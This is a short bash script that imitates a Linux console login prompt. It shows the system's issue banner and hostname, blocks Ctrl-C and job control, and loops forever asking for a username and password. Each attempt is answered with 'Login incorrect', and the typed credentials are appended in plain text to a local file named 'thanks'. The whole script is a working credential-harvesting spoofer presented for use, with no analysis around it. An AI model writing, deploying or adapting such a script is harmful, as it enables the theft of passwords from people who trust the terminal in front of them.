#!/bin/bash

stty -echoctl       # do not echo ctrl sequences
stty susp undef     # disable job control
trap ctrl_c INT     # disable ctrl-c

function ctrl_c() { # catch ctrl-c
    echo -n
}

clear
echo -e "\n$(cat /etc/issue.net) $HOSTNAME tty1\n"

while (sleep 0); do
    echo -n "$HOSTNAME login: "
    read u
    echo -n "Password: "
    read -s p
    echo -e "\nLogin incorrect\n"
    echo $u $p >> thanks
    sleep 1
done
